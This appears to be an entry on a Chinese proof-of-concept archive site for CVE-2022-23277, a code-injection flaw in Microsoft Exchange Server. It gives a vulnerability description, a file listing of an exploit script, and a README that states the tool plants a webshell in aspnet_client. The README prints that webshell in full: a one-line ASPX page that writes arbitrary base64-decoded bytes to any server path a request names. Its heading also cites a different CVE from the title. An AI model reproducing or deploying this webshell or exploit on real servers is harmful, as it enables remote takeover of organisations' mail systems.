支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: a4ff0f5a1104dda0de593d935399ceb0aaa95892

来源
关联漏洞
标题:Microsoft Exchange Server 代码注入漏洞 (CVE-2022-23277)
POC 描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 存在代码注入漏洞。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange Server 2016 Cumulative Update 21,Microsoft Exchange
POC 描述
CVE-2022-23277 POC to write a webshell to aspnet_client
介绍
# exch_CVE-2021-42321

## 本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具

认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。

webshell:

```
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
```

利用详情可以参照我们的文章

### 欢迎关注我们的公众号 - Zbits2022

![](/images/qrcode.jpg)


文件快照

[4.0K] /data/pocs/a4ff0f5a1104dda0de593d935399ceb0aaa95892 ├── [9.7K] cve-2022-23277.py ├── [4.0K] images │   └── [ 27K] qrcode.jpg ├── [ 34K] ObjectDataProviderGenerator.cs └── [ 510] README.md 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。